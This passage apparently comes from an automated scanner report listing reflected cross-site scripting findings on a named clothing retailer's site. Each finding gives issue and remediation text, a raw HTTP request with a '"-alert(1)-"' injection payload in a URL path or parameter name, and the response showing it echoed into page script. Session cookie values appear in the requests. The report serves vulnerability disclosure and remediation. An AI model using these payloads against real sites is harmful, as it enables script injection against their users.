Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vnrisbkf447g71ipgtt5g80lq7; expires=Tue, 09-Nov-2010 17:19:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Garment
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/garmentcare/?9a3c9"-alert(1)-"a1e63e7882e=1");
//]]>
...[SNIP]...

1.241. http://www.fredperry.com/sale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5db9"-alert(1)-"cbfb29d8f4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /saleb5db9"-alert(1)-"cbfb29d8f4b/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=916ls611rg8chlttk61e4d3rq3; expires=Tue, 09-Nov-2010 17:22:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/saleb5db9"-alert(1)-"cbfb29d8f4b/");
//]]>
...[SNIP]...

1.242. http://www.fredperry.com/sale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /sale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"b62cca0ff19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale/?62888"-alert(1)-"b62cca0ff19=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rvpr52jaj3fnlthbsvplflfr57; expires=Tue, 09-Nov-2010 17:21:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Sale -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sale/?62888"-alert(1)-"b62cca0ff19=1");
//]]>
...[SNIP]...

1.243. http://www.fredperry.com/shops/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b770"-alert(1)-"c5aafd3c260 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shops5b770"-alert(1)-"c5aafd3c260/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7j4qaa56qrrdappj2bqaoq9jj2; expires=Tue, 09-Nov-2010 17:22:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/shops5b770"-alert(1)-"c5aafd3c260/");
//]]>
...[SNIP]...

1.244. http://www.fredperry.com/shops/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1313"-alert(1)-"76dcfd4c4ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shops/?c1313"-alert(1)-"76dcfd4c4ee=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=til5vppvfl3smgi3hrnqdo48h7; expires=Tue, 09-Nov-2010 17:20:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Our Sho
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/shops/?c1313"-alert(1)-"76dcfd4c4ee=1");
//]]>
...[SNIP]...

1.245. http://www.fredperry.com/site-map/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /site-map/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92156"-alert(1)-"81e165d4a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site-map92156"-alert(1)-"81e165d4a2d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qo6aq5frbvf38upse3suim6k05; expires=Tue, 09-Nov-2010 17:25:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/site-map92156"-alert(1)-"81e165d4a2d/");
//]]>
...[SNIP]...

1.246. http://www.fredperry.com/site-map/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /site-map/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79ccb"-alert(1)-"2a6cc699b53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site-map/?79ccb"-alert(1)-"2a6cc699b53=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=a4invcsiuo08imktuvfah4u0v5; expires=Tue, 09-Nov-2010 17:23:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Site Ma
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/site-map/?79ccb"-alert(1)-"2a6cc699b53=1");
//]]>
...[SNIP]...

1.247. http://www.fredperry.com/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0bde"-alert(1)-"e890c6a858c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womena0bde"-alert(1)-"e890c6a858c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:00:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g3709uchv23iga3tdnoju2fa24; expires=Tue, 09-Nov-2010 17:00:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womena0bde"-alert(1)-"e890c6a858c/");
//]]>
...[SNIP]...

1.248. http://www.fredperry.com/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa6ee"-alert(1)-"553b47cbfc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/?aa6ee"-alert(1)-"553b47cbfc3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7uk429dmh07smkjlej1h69bn43; expires=Tue, 09-Nov-2010 17:00:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/?aa6ee"-alert(1)-"553b47cbfc3=1");
//]]>
...[SNIP]...

1.249. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7ca2"-alert(1)-"8d9664b6ac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenb7ca2"-alert(1)-"8d9664b6ac4/amy-winehouse-landing/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uav4qcl07q89lvv7o5u01co5o4; expires=Tue, 09-Nov-2010 17:04:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenb7ca2"-alert(1)-"8d9664b6ac4/amy-winehouse-landing/");
//]]>
...[SNIP]...

1.250. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a60ae"-alert(1)-"0aeb64a8199 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse-landinga60ae"-alert(1)-"0aeb64a8199/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5grts2msu40i2sei9s2rh51qq3; expires=Tue, 09-Nov-2010 17:04:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse-landinga60ae"-alert(1)-"0aeb64a8199/");
//]]>
...[SNIP]...

1.251. http://www.fredperry.com/women/amy-winehouse-landing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7af5"-alert(1)-"7367eb33b78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse-landing/?c7af5"-alert(1)-"7367eb33b78=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hqde0icrv2qnj40gqcq584nbc3; expires=Tue, 09-Nov-2010 17:04:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse-landing/?c7af5"-alert(1)-"7367eb33b78=1");
//]]>
...[SNIP]...

1.252. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fec6"-alert(1)-"0f7c2574e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women8fec6"-alert(1)-"0f7c2574e94/amy-winehouse/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mb073il2o1r8resr30jv271527; expires=Tue, 09-Nov-2010 17:10:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women8fec6"-alert(1)-"0f7c2574e94/amy-winehouse/");
//]]>
...[SNIP]...

1.253. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92813"-alert(1)-"4542ebe28f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse92813"-alert(1)-"4542ebe28f8/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bj52mihcqnv87j59oben847e36; expires=Tue, 09-Nov-2010 17:11:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse92813"-alert(1)-"4542ebe28f8/");
//]]>
...[SNIP]...

